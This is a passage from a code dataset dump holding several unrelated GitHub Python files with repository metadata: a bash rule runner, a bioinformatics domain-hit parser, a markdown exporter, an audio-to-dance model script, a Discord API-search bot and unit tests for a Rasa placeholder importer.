parse_rule(line)\n if open_statement:\n generated_scripts.write('fi\\n')\n open_statement = False\n outp_line = make_if_statement(inputs, outputs)\n open_statement = True\n outp_line += 'echo \"Running rule: {}\"\\n'.format(line[1:])\n except NotARule:\n outp_line = line\n else:\n outp_line = line\n generated_scripts.write(outp_line) \n\n if open_statement:\n generated_scripts.write('fi\\n')\n open_statement = False\n generated_scripts.flush()\n\n subprocess.call(['/bin/bash', generated_scripts.name])\n\n generated_scripts.close()\n\nif __name__ == '__main__':\n run_shell()\n", "repo_name": "btel/bashflow", "sub_path": "bashflow/shell.py", "file_name": "shell.py", "file_ext": "py", "file_size_in_byte": 2333, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.match", "line_number": 15, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 18, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 19, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 49, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 53, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "32360324596", "text": "import logging\nimport json\nimport re\n\nfrom collections import defaultdict\nfrom operator import attrgetter\n\nfrom synthaser import settings\nfrom synthaser.models import Domain\n\n\nLOG = logging.getLogger(__name__)\n\n\nDOMAINS = {}\n\n\ndef load_rules_json(json_file):\n with open(json_file) as fp:\n return json.load(fp)\n\n\ndef load_domains(rule_file):\n \"\"\"Loads domains from a synthaser rule file.\n\n Rule file domain schema:\n {\n 'name': KS,\n 'domains': [\n {\n 'accession': 'smart00825',\n 'name': 'PKS_KS'\n ...\n },\n ...\n ],\n ...\n }\n\n This function flattens the domain type array to create a\n dictionary of domain families, so these can be easily looked up\n directly from CD-Search rows.\n \"\"\"\n rules = load_rules_json(rule_file)\n domains = {\n family[\"accession\"]: {**family, \"type\": domain[\"name\"]}\n for domain in 
rules[\"domains\"]\n for family in domain[\"domains\"]\n }\n update_domains(domains)\n\n\ndef update_domains(domains):\n DOMAINS.clear()\n DOMAINS.update(domains)\n\n\n# Load defaults, stored in synthaser/domains.json\nload_domains(settings.RULE_FILE)\n\n\ndef domain_from_row(row):\n \"\"\"Parse a domain hit from a row in a CD-search results file.\n\n For example, a typical row might looks like:\n\n >>> print(row)\n Q#1 - >AN6791.2\\tspecific\\t225858\\t9\\t1134\\t0\\t696.51\\tCOG3321\\tPksD\\t-\\tcl09938\n\n Using this function will generate:\n\n >>> domain_from_row(row)\n PksD [KS] 9-1134\n\n Parameters:\n row (str): Tab-separated row from a CDSearch results file\n Returns:\n Domain: Instance of the Domain class containing information about this hit\n Raises:\n ValueError: If the domain in this row is not in the DOMAINS dictionary.\n \"\"\"\n (\n *_,\n pssm,\n start,\n end,\n evalue,\n bitscore,\n accession,\n domain,\n _,\n superfamily,\n ) = row.split(\"\\t\")\n\n if accession not in DOMAINS:\n raise ValueError(f\"'{domain}' not a synthaser key domain\")\n\n return Domain(\n pssm=pssm,\n type=DOMAINS[accession][\"type\"],\n domain=domain,\n start=int(start),\n end=int(end),\n evalue=float(evalue),\n bitscore=float(bitscore),\n accession=accession,\n superfamily=superfamily,\n )\n\n\ndef parse_rpsbproc(handle):\n \"\"\"Parse a results file generated by rpsblast->rpsbproc.\n\n This function takes a handle corresponding to a rpsbproc output file.\n local.rpsbproc returns a subprocess.CompletedProcess object, which contains the\n results as byte string in it's stdout attribute.\n \"\"\"\n # Sanitize input. Should work for either an open file handle (str, still contains \\n\n # when iterating) or byte-string stdout stored in a CompletedProcess object passed to this\n # function as e.g. process.stdout.splitlines()\n stdout = \"\\n\".join(\n line.decode().strip() if isinstance(line, bytes) else line.strip()\n for line in handle\n )\n\n # Files produced by rpsbproc have anchors for easy parsing. Each query sequence\n # is given a block starting/ending with QUERY/ENDQUERY, and domain hits for the\n # query with DOMAINS/ENDDOMAINS.\n query_pattern = re.compile(\n r\"QUERY\\tQuery_\\d+\\tPeptide\\t\\d+\\t([A-Za-z0-9.]+?)\\n\"\n r\"DOMAINS\\n(.+?)ENDDOMAINS\",\n re.DOTALL,\n )\n\n domains = defaultdict(list)\n for match in query_pattern.finditer(stdout):\n query = match.group(1)\n for row in match.group(2).split(\"\\n\"):\n try:\n domain = domain_from_row(row)\n except ValueError:\n continue\n domains[query].append(domain)\n\n return domains\n\n\ndef parse_cdsearch(handle):\n \"\"\"Parse a CD-Search results table and instantiate Domain objects for each hit.\n\n Parameters:\n handle (file): Open file handle corresponding to a CD-Search results file.\n Returns:\n results (dict): Lists of Domain objects keyed on the query they were found in.\n \"\"\"\n query_regex = re.compile(r\"Q#\\d+? 
- [>]?(.+?)\\t\")\n results = defaultdict(list)\n for row in handle:\n try:\n row = row.decode()\n except AttributeError:\n pass # in case rows are unicode\n if not row.startswith(\"Q#\") or row.isspace():\n continue\n query = query_regex.search(row).group(1)\n try:\n domain = domain_from_row(row)\n except ValueError:\n continue\n results[query].append(domain)\n return dict(results)\n\n\ndef filter_results(results, **kwargs):\n \"\"\"Build Synthase objects from a parsed results dictionary.\n\n Any additional kwargs are passed to _filter_domains.\n\n Parameters:\n results (dict): Grouped Domains; output from _parse_cdsearch_table.\n Returns:\n synthases (list): Synthase objects containing all Domain objects found in the CD-Search.\n \"\"\"\n filtered = {}\n for name, domains in results.items():\n domains = filter_domains(domains, **kwargs)\n if not domains:\n LOG.error(\"No domains remain after filtering for %s\", name)\n filtered[name] = domains\n return filtered\n\n\ndef is_fragmented_domain(one, two, coverage_pct=0.5, tolerance_pct=0.1):\n \"\"\"Detect if two adjacent domains are likely a single domain.\n\n This is useful in cases where a domain is detected with multiple small hits. For\n example, an NRPS may have two adjacent condensation (C) domain hits that are\n both individually too small and low-scoring, but should likely just be merged.\n\n If two hits are close enough together, such that the distance between the start\n of the first and end of the second is within some tolerance (default +-10%) of the\n total length of a domains PSSM, this function will return True.\n\n Parameters:\n one (Domain): Domain instance\n two (Domain): Domain instance\n coverage_pct (float):\n Conserved domain hit percentage coverage threshold. A hit is considered\n truncated if its total length is less than coverage_pct * CD length.\n tolerance_pct (float):\n Percentage of CD length to use when calculating acceptable lower/upper\n bounds for combined domains.\n Returns:\n True: Domain instances are likely fragmented and should be combined.\n False: Domain instances should be separate.\n \"\"\"\n if one.type != two.type:\n raise ValueError(\"Expected Domain instances of same type\")\n\n pssm_length = DOMAINS[one.accession][\"length\"]\n coverage = pssm_length * coverage_pct\n tolerance = pssm_length * tolerance_pct\n one_length, two_length = len(one), len(two)\n\n return (\n one_length < coverage\n and two_length < coverage\n and pssm_length - tolerance <= two.end - one.start <= pssm_length + tolerance\n and one_length + two_length > coverage\n )\n\n\ndef filter_domains(domains, by=\"evalue\", coverage_pct=0.5, tolerance_pct=0.1):\n \"\"\"Filter overlapping Domain objects and test adjcency rules.\n\n Adjacency rules are tested again here, in case they are missed within overlap\n groups. For example, the NRPS-para261 domain is not always entirely contained by\n a condensation domain, so should be caught by this pass.\n\n Parameters:\n domains (list): Domain instances to be filtered\n by (str): Metric used to choose representative domain hit (def. 
'evalue')\n coverage_pct (float): Conserved domain coverage percentage threshold\n tolerance_pct (float): CD length tolerance percentage threshold\n Returns:\n list: Domain objects remaining after filtering\n \"\"\"\n\n domains = [\n choose_representative_domain(group, by)\n for group in group_overlapping_hits(domains)\n ]\n\n i, total = 1, len(domains)\n while i < total:\n if i + 1 == total:\n break\n previous, current = domains[i - 1 : i + 1]\n\n # When domains are likely together, e.g. two small C domain hits right next\n # to each other or multiple Methyltransf_X domains, extend its border\n if previous.type == current.type and is_fragmented_domain(\n previous, current, coverage_pct, tolerance_pct\n ):\n previous.end = current.end\n del domains[i]\n continue\n i += 1\n return domains\n\n\ndef choose_representative_domain(group, by=\"evalue\"):\n \"\"\"Select the best domain from a collection of overlapping domains.\n\n This function tests rules stored in `special_rules`, which are lambdas that\n take two variables. It sorts the group by e-value, then tests each rule using\n the container (first, best scoring group) against all other Domains in the\n group.\n\n If any test is True, the container type is set to the rule key and returned.\n Otherwise, this function will return the container Domain with no modification.\n\n Parameters:\n group (list): Overlapping Domain objects\n by (str):\n Measure to use when determining the best domain of the group. Choices:\n 'bitscore': return domain with highest bitscore (relative to threshold)\n 'evalue': return domain with lowest E-value\n 'length': return longest domain hit\n Returns:\n Domain:\n Highest scoring Domain in the group. If any special rules have been\n satisfied, the type of this Domain will be set to that rule\n (e.g. Condensation -> Epimerization).\n \"\"\"\n key_functions = {\n \"bitscore\": (lambda d: d.bitscore / DOMAINS[d.accession][\"bitscore\"], True),\n \"evalue\": (lambda d: d.evalue, False),\n \"length\": (lambda d: d.end - d.start, True),\n }\n\n if by not in key_functions:\n raise ValueError(\"Expected 'bitscore', 'evalue' or 'length'\")\n\n key, reverse = key_functions[by]\n\n return sorted(group, key=key, reverse=reverse)[0]\n\n\ndef group_overlapping_hits(domains):\n \"\"\"Iterator that groups Domain objects based on overlapping locations.\n\n Parameters:\n domains (list): Collection of Domain objects belonging to a Synthase\n Yields:\n group (list): Group of overlapping Domain objects\n \"\"\"\n sorted_domains = sorted(domains, key=attrgetter(\"start\"))\n\n if not sorted_domains:\n return\n\n # Initialise first group and initial upper bound\n first = sorted_domains.pop(0)\n group, border = [first], first.end\n\n for domain in sorted_domains:\n\n # New domain overlaps current run, so save and set new upper bound\n # Use 10bp to account for slight domain overlap between distinct groups\n if domain.start + 10 <= border:\n group.append(domain)\n border = max(border, domain.end)\n\n # Current run is over; yield and reset\n else:\n yield group\n group, border = [domain], domain.end\n\n # End the final run\n yield group\n\n\ndef parse(handle, mode=\"remote\", **kwargs):\n \"\"\"Parse CD-Search results.\n\n Any additional kwargs are passed to `synthases_from_results`.\n\n Parameters:\n handle (file):\n An open CD-Search results file handle. If you used the website to\n analyse your sequences, the file you should download is Domain hits,\n Data mode: Full, ASN text. 
When using a `CDSearch` object, this\n format is automatically selected.\n mode (str): Search mode ('local' or 'remote')\n Returns:\n list: A list of Synthase objects parsed from the results file.\n Raises:\n ValueError: Search mode not 'local' or 'remote'\n \"\"\"\n if mode == \"remote\":\n return filter_results(parse_cdsearch(handle), **kwargs)\n if mode == \"local\":\n return filter_results(parse_rpsbproc(handle), **kwargs)\n raise ValueError(\"Expected 'remote' or 'local'\")\n", "repo_name": "gamcil/synthaser", "sub_path": "synthaser/results.py", "file_name": "results.py", "file_ext": "py", "file_size_in_byte": 11896, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "json.load", "line_number": 20, "usage_type": "call"}, {"api_name": "synthaser.settings.RULE_FILE", "line_number": 59, "usage_type": "attribute"}, {"api_name": "synthaser.settings", "line_number": 59, "usage_type": "name"}, {"api_name": "synthaser.models.Domain", "line_number": 98, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 129, "usage_type": "call"}, {"api_name": "re.DOTALL", "line_number": 132, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 135, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 156, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 157, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 318, "usage_type": "call"}]} +{"seq_id": "19715917822", "text": "from mdutils.mdutils import MdUtils\nfrom mdutils import Html\nimport pandas\nfrom datetime import date\n\n\nclass Output:\n def __init__(self, config):\n self.config = config\n\n def to_file(self, doc_contents):\n title = doc_contents[\"title\"]\n author = doc_contents[\"author\"]\n date_today = str(date.today())\n highlights = doc_contents[\"highlights\"]\n\n mdFile = MdUtils(file_name=\"test\", title=title)\n mdFile.new_header(level=1, title=title)\n mdFile.new_line(author)\n\n mdFile.new_line(date_today)\n mdFile.new_header(level=2, title=\"Highlights\")\n mdFile.new_header(level=3, title=\"Important\")\n for i in highlights:\n if i[\"function\"] == \"important\":\n mdFile.write(i[\"text\"])\n mdFile.write(\"[@{}]\".format(doc_contents[\"citekey\"]))\n mdFile.write(\"\\n\\n\")\n\n mdFile.new_header(level=3, title=\"Definitions\")\n for i in highlights:\n if i[\"function\"] == \"definition\":\n mdFile.write(i[\"text\"])\n mdFile.write(\"[@{}]\".format(doc_contents[\"citekey\"]))\n mdFile.write(\"\\n\\n\")\n\n mdFile.new_header(level=3, title=\"Highlights\")\n for i in highlights:\n if i[\"function\"] == \"default\":\n mdFile.write(i[\"text\"])\n mdFile.write(\"[@{}]\".format(doc_contents[\"citekey\"]))\n mdFile.write(\"\\n\\n\")\n\n mdFile.new_header(level=3, title=\"Methodology\")\n for i in highlights:\n if i[\"function\"] == \"definition\":\n mdFile.write(i[\"text\"])\n mdFile.write(\"[@{}]\".format(doc_contents[\"citekey\"]))\n mdFile.write(\"\\n\\n\")\n\n mdFile.new_header(level=3, title=\"Follow-up\")\n for i in highlights:\n if i[\"function\"] == \"follow_up\":\n mdFile.write(i[\"text\"])\n mdFile.write(\"[@{}]\".format(doc_contents[\"citekey\"]))\n mdFile.write(\"\\n\\n\")\n\n mdFile.create_md_file()\n", "repo_name": "carlsmith23/extractor", "sub_path": "output.py", "file_name": "output.py", "file_ext": "py", "file_size_in_byte": 2027, "program_lang": "python", "lang": 
"en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.date.today", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 14, "usage_type": "name"}, {"api_name": "mdutils.mdutils.MdUtils", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "32872124084", "text": "import librosa\nimport codecs\nimport json\nimport numpy as np\nimport os\nfrom keras.models import load_model\nfrom sklearn import preprocessing\nfrom dataLoader import dataLoader\n\nsound_name = 'audio.mp3'\nresults_path = 'outputs/convlstm/Results_' + sound_name\n\nmodel_path = 'outputs/convlstm/Checkpoints/'\nmodel_name = 'model.ckpt.0100.hdf5'\n\npath_to_data_test = 'dataset_master/DANCE_C_1' # For testing\n\nSPLIT = True\nSPLIT_LEN = 3\n\nrepertory_exist = False\n\n\ndef soundTest(sond_name):\n sound_path = 'soundTest/' + sond_name\n\n # Load the audio as a waveform `y`\n # Store the sampling rate as `sr`\n y, sr = librosa.load(sound_path, sr=44100, dtype='float32')\n hop_length = 1764\n n_fft = 1024\n\n acoustic_features = []\n\n n = len(y)\n nb_frames = 0\n\n for x in range(0, n - hop_length, hop_length):\n slice = y[x:hop_length + x]\n stfft = librosa.feature.melspectrogram(y=slice, sr=sr, hop_length=256, n_fft=n_fft)\n acoustic_features.append(stfft)\n nb_frames += 1\n acoustic_features = np.concatenate(acoustic_features, axis=1)\n return acoustic_features, nb_frames\n\n\ndef split_sequence(sequence, n_steps):\n \"\"\"\n\n :param sequence:\n :param n_steps:\n :return: a matrix where n_columns = n_step, and n_row = ( (len(sequence) - n_steps ) / stride ) + 1\n and stride = 1.\n \"\"\"\n n_steps = n_steps - 1\n X = list()\n for i in range(len(sequence)):\n # find the end of this pattern\n end_ix = i + n_steps\n # check if we are beyond the sequence\n if end_ix > len(sequence) - 1:\n break\n # gather input and output parts of the pattern\n seq_x = sequence[i:end_ix + 1]\n X.append(seq_x)\n return np.array(X)\n\n\ndef complete_sequence(sequence, n_steps):\n \"\"\"\n After using split sequence, the sequence is left with (samples - (n_steps -1), n_steps, n_features).\n this will complete the sequence to (samples, n_steps, n_features) with a the dat from thhe sequence.\n :param sequence:\n :param n_steps:\n :return: a sequence of size ((n_steps -1), n_steps, n_features) to add too the split sequence.\n \"\"\"\n X = list()\n for i in range(n_steps - 1):\n step = list()\n n_i = n_steps - i\n for j in range(n_i):\n step.append(sequence[0])\n for j in range(n_i, n_steps):\n l = 1\n step.append(sequence[l])\n l += 1\n step = np.array(step)\n X.append(step)\n return np.array(X)\n\n\ndef normalize_audio(data):\n #normalizer = preprocessing.Normalizer().fit(data)\n #data = normalizer.transform(data)\n std_scale = preprocessing.StandardScaler().fit(data)\n data = std_scale.transform(data)\n return data\n\n\ndef reshape_acoustic_features(data, start_pos, end_pos):\n n_frames = end_pos - start_pos\n x = data.shape[0]\n y = int(data.shape[1] / n_frames)\n data = np.reshape(data, (n_frames, x, y))\n data = np.expand_dims(data, axis=3)\n return data\n\n\ndef save(output, start_pos, end_pos, path):\n nb_data = output.shape[0]\n output = np.reshape(output, (nb_data, 23, 3))\n output = output.tolist()\n skeletons = {\"length\": nb_data, \"skeletons\": output}\n with open(path + '/skeletons.json', \"w\") as write_file:\n json.dump(skeletons, codecs.open(path + '/skeletons.json', 'w', encoding='utf-8'),\n separators=(',', ':'), sort_keys=True,\n indent=4)\n\n 
start_pos = int(start_pos)\n    end_pos = int(end_pos)\n    config = {\"start_position\": start_pos, \"end_position\": end_pos}\n\n    with open(path + '/config.json', \"w\") as write_file:\n        json.dump(config, write_file)\n\n\nif __name__ == '__main__':\n    model = load_model(model_path + model_name)\n    if SPLIT:\n        testX, testy, motions_max, motions_min, start_position, end_position = dataLoader(\n            path_to_data=path_to_data_test,\n            split=True,\n            split_len=SPLIT_LEN,\n            measures=True)\n        acoustic_features, nb_frames = soundTest(sound_name)\n        acoustic_features = normalize_audio(acoustic_features)\n        acoustic_features = reshape_acoustic_features(acoustic_features, start_pos=0, end_pos=nb_frames)\n        input = split_sequence(acoustic_features, SPLIT_LEN)\n        add = complete_sequence(acoustic_features, SPLIT_LEN)\n\n        input_sequence = np.concatenate((add, input))  # note: input_sequence is never used below; the model is fed the un-padded input\n        output = model.predict(input)\n        one = np.ones(output.shape)\n        output = (output + one) * (motions_max - motions_min) / 2 + motions_min\n        print(\"input shape = \", input.shape)\n        print(\"output shape = \", output.shape)\n    else:\n        testX, testy, motions_max, motions_min, start_position, end_position = dataLoader(\n            path_to_data=path_to_data_test,\n            split=False,\n            split_len=3,\n            measures=True)\n        acoustic_features, nb_frames = soundTest(sound_name)\n        acoustic_features = normalize_audio(acoustic_features)\n        acoustic_features = reshape_acoustic_features(acoustic_features, start_pos=0, end_pos=nb_frames)\n\n        input = acoustic_features\n        output = model.predict(input)\n        one = np.ones(output.shape)\n        output = (output + one) * (motions_max - motions_min) / 2 + motions_min\n        print(\"input shape = \", input.shape)\n        print(\"output shape = \", output.shape)\n\n    if repertory_exist:\n        save(output, start_position, end_position, path=os.getcwd() + '/' + results_path)\n    else:\n\n        try:\n            os.mkdir(os.getcwd() + '/' + results_path)\n        except OSError:\n            print(\"Creation of the directory %s failed\" % (os.getcwd() + '/' + results_path))\n            quit()\n        else:\n            print(\"Successfully created the directory %s \" % (os.getcwd() + '/' + results_path))\n\n        save(output, start_position, end_position, path=os.getcwd() + '/' + results_path)\n", "repo_name": "GaspardMurat/musicToDance", "sub_path": "soundTest.py", "file_name": "soundTest.py", "file_ext": "py", "file_size_in_byte": 5890, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "librosa.load", "line_number": 29, "usage_type": "call"}, {"api_name": "librosa.feature.melspectrogram", "line_number": 40, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 89, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 95, "usage_type": "name"}, {"api_name": "numpy.reshape", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 111, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 115, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 115, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 124, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 128, "usage_type": "call"}, {"api_name": "dataLoader.dataLoader", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 143, "usage_type": "call"}, {"api_name": "dataLoader.dataLoader", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 159, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 165, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 169, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 169, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 171, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 174, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 176, "usage_type": "call"}]}
+{"seq_id": "71622934246", "text": "import discord\nimport requests\n\nimport re\n\n\ndef Find(string):\n    regex = r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\"\n    url = re.findall(regex, string)\n    return [x[0] for x in url]\n\n\nTOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'\n\nclient = discord.Client()\n\n\n@client.event\nasync def on_message(message):\n    if message.author == client.user:\n        return\n\n    if message.content.startswith('!api-category'):\n        search = message.content\n        search = search.replace('!api-category ', '')\n        searchterms = ''.join([i for i in search if not i.isdigit()])\n\n        if searchterms == '':\n            await message.channel.send(\n                'Please use ```!api-category [name]``` to get APIs of that category. The current categories '\n                'are Animals, Anime, Anti-Malware, Art&Design, Books, Business, Calendar, Cloud Storage'\n                '&FileStorage, ContinuousIntegration, Cryptocurrency, CurrencyExchange, Data'\n                'Validation, Development, Dictionaries, Documents&Productivity, Environment, '\n                'Events, Finance, Food&Drink, Games&Comics, Geocoding, Government, Health, Jobs, '\n                'MachineLearning, Music, News, OpenData, OpenSourceProjects, Patent, Personality, '\n                'Photography, Science&Math, Security, Shopping, Social, Sports&Fitness, TestData, '\n                'TextAnalysis, Tracking, Transportation, URLShorteners, Vehicle, Video, Weather.')\n        else:\n            url = 'https://api.publicapis.org/entries?category=' + searchterms + '&https=true'\n            r = requests.get(url).text\n            msg = ''\n            if len(r) > 2000:\n                for i in range(0, 1999):\n                    msg += r[i]\n            else:\n                msg = r\n            AllA = Find(msg)\n            outputstring = \"Here are some APIs from the \"\n            outputstring += search\n            outputstring += \" category: \"\n            for i in range(len(AllA) - 1):  # the last extracted link is skipped; it may be incomplete when the response was truncated above\n                index = str(i + 1)\n                outputstring += \"Link \"\n                outputstring += index\n                outputstring += \": \"\n                outputstring += str(AllA[i])\n                outputstring += \" \\n\"\n            await message.channel.send(outputstring)\n\n    if message.content.startswith('!api-random'):\n        Link = Find(requests.get('https://api.publicapis.org/random?auth=null').text)\n        outputstring = \"Here's a random API! \\n\"\n        outputstring += Link[0]\n\n        await message.channel.send(outputstring)\n\n    if message.content.startswith('!api-search'):\n        desc = message.content\n        minus = '!api-search '\n        desc = desc.replace(minus, '')\n        r = requests.get('https://api.publicapis.org/entries?description=' + desc + '&https=true').text\n        if len(r) > 2000:\n            msg = r[:1999]\n        else:\n            msg = r\n\n        AllAPIs = Find(msg)\n\n        outputstring = \"Here are some APIs related to \"\n        outputstring += desc\n        outputstring += \": \\n\"\n\n        for i in range(len(AllAPIs) - 1):\n            index = str(i + 1)\n            outputstring += \"Link \"\n            outputstring += index\n            outputstring += \": \"\n            outputstring += str(AllAPIs[i])\n            outputstring += \" \\n\"\n\n        await message.channel.send(outputstring)\n\n    if message.content.startswith('!stack-search'):\n        searchterm = message.content\n        searchterms = searchterm.replace('!stack-search ', '')\n        r = requests.get(\n            'https://api.stackexchange.com/2.2/search?order=desc&sort=activity&intitle=' + searchterms + '&site=stackoverflow').text\n        if len(r) > 2000:\n            msg = r[:1999]\n        else:\n            msg = r\n        AllQ = Find(msg)\n        AllQ = [i for i in AllQ if 'questions' in i]\n\n        outputstring = \"For your search for the following search terms: \"\n        outputstring += searchterm\n        outputstring += \" , we could find the following related links: \"\n        for i in range(len(AllQ) - 1):\n            index = str(i + 1)\n            outputstring += \" \\n\"\n            outputstring += \"Link \"\n            outputstring += index\n            outputstring += \": \"\n            outputstring += str(AllQ[i])\n            outputstring += \" \\n\"\n\n        await message.channel.send(outputstring)\n\n\n@client.event\nasync def on_ready():\n    print('Logged in as')\n    print(client.user.name)\n    print(client.user.id)\n    print('------')\n\n\nclient.run(TOKEN)\n", "repo_name": "TheVikJ/Devscord", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 4851, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.findall", "line_number": 9, "usage_type": "call"}, {"api_name": "discord.Client", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 40, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 61, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 71, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 98, "usage_type": "call"}]}
+{"seq_id": "30551773042", "text": "from typing import Any, Dict, List, Tuple\nfrom unittest import mock\n\nimport faker\nimport pytest\nfrom rasa.shared.nlu.training_data import loading\nfrom rasa.shared.nlu.training_data.message import Message\nfrom rasa.shared.nlu.training_data.training_data import TrainingData\n\nfrom rasam import PlaceholderImporter\n\n\n@pytest.mark.asyncio\nasync def test_get_nlu_data() -> None:\n    training_data = TrainingData(\n        training_examples=[\n            Message.build(\"hello\", \"intent_test\"),\n            Message.build(\"hello @name\", \"intent_test\"),\n            Message.build(\"hello\"),\n        ]\n    )\n    with mock.patch.object(loading, \"load_data\") as load_data, mock.patch.object(faker, \"Faker\") as Faker:\n        faker_ = Faker()\n        faker_.name.return_value = \"Nikola Tesla\"\n        load_data.return_value = training_data\n\n        importer = PlaceholderImporter()\n        importer.config = {\"importers\": [{\"name\": \"rasam.PlaceholderImporter\"}]}\n        importer._nlu_files = [\"test\"]\n        new_training_data = await importer.get_nlu_data()\n\n        
faker_.seed_instance.assert_called_once_with(importer.DEFAULT_FAKE_DATA_COUNT)\n load_data.assert_called_once_with(\"test\", \"en\")\n message: Message\n expected_messages = [\n Message.build(\"hello\", \"intent_test\"),\n Message.build(\"hello Nikola Tesla\", \"intent_test\"),\n Message.build(\"hello\"),\n ]\n assert len(new_training_data.training_examples) == len(expected_messages)\n for message, expected in zip(new_training_data.training_examples, expected_messages):\n assert message.get(\"intent\") == expected.get(\"intent\")\n assert message.get(\"text\") == expected.get(\"text\")\n\n\n@pytest.mark.parametrize(\n \"test, text, fake_data, matches, count, expected\",\n [\n (\n \"simple test\",\n \"hello @name\",\n [\"Nikola Tesla\", \"Nikola Tesla\"],\n [(\"@name\", \"name\", 6)],\n 1,\n [\"hello Nikola Tesla\"],\n ),\n (\n \"2 fake data\",\n \"hello @name\",\n [\"Nikola Tesla\", \"Nikola Tesla\", \"Thomas Edison\", \"Thomas Edison\"],\n [(\"@name\", \"name\", 6)],\n 2,\n [\"hello Nikola Tesla\", \"hello Thomas Edison\"],\n ),\n ],\n)\n@mock.patch.object(faker, \"Faker\")\n@pytest.mark.asyncio\nasync def test_replace_placeholders(\n faker_: mock.Mock,\n test: str,\n text: str,\n fake_data: List[str],\n matches: List[Tuple[str, str, int]],\n count: int,\n expected: List[str],\n) -> None:\n faker_.name.side_effect = fake_data\n importer = PlaceholderImporter()\n message = Message.build(text)\n index = 0\n async for new_message in importer.replace_placeholders(message, faker_, matches, count):\n assert new_message.data.get(\"text\") == expected[index]\n index += 1\n assert index == count\n\n\n@pytest.mark.parametrize(\n \"test, text, fake_data, matches, expected\",\n [\n (\n \"single placeholder\",\n \"hello {name}\",\n {\"name\": [\"Nikola Tesla\"]},\n [(\"{name}\", \"name\", 6)],\n \"hello Nikola Tesla\",\n ),\n (\n \"repeated {} placeholders\",\n \"hello {name} and {name}\",\n {\"name\": [\"Thomas Edison\", \"Nikola Tesla\"]},\n [(\"{name}\", \"name\", 6), (\"{name}\", \"name\", 16)],\n \"hello Nikola Tesla and Thomas Edison\",\n ),\n (\n \"mixed repeated placeholders\",\n \"hello @name and {name}\",\n {\"name\": [\"Thomas Edison\", \"Nikola Tesla\"]},\n [(\"@name\", \"name\", 6), (\"{name}\", \"name\", 16)],\n \"hello Nikola Tesla and Thomas Edison\",\n ),\n (\n \"multiple placeholders\",\n \"call me on @day at {time}\",\n {\"day_of_week\": [\"Monday\"], \"time\": [\"12:00\"]},\n [(\"@day\", \"day\", 11), (\"{time}\", \"time\", 19)],\n \"call me on Monday at 12:00\",\n ),\n (\n \"single number\",\n \"{number}\",\n {\"random_choices\": [[\"integer\"]], \"integer\": [\"123\"]},\n [(\"{number}\", \"number\", 0)],\n \"123\",\n ),\n (\n \"multiple numbers\",\n \"add @number and @number\",\n {\"random_choices\": [[\"integer\"], [\"integer\"]], \"integer\": [\"456\", \"123\"]},\n [(\"@number\", \"number\", 4), (\"@number\", \"number\", 16)],\n \"add 123 and 456\",\n ),\n (\n \"single any\",\n \"{any}\",\n {\"random_choices\": [[\"name\"]], \"name\": [\"Nikola Tesla\"]},\n [(\"{any}\", \"any\", 0)],\n \"Nikola Tesla\",\n ),\n (\n \"multiple any\",\n \"I saw @any and @any\",\n {\"random_choices\": [[\"name\"], [\"name\"]], \"name\": [\"Thomas Edison\", \"Nikola Tesla\"]},\n [(\"@any\", \"any\", 6), (\"@any\", \"any\", 15)],\n \"I saw Nikola 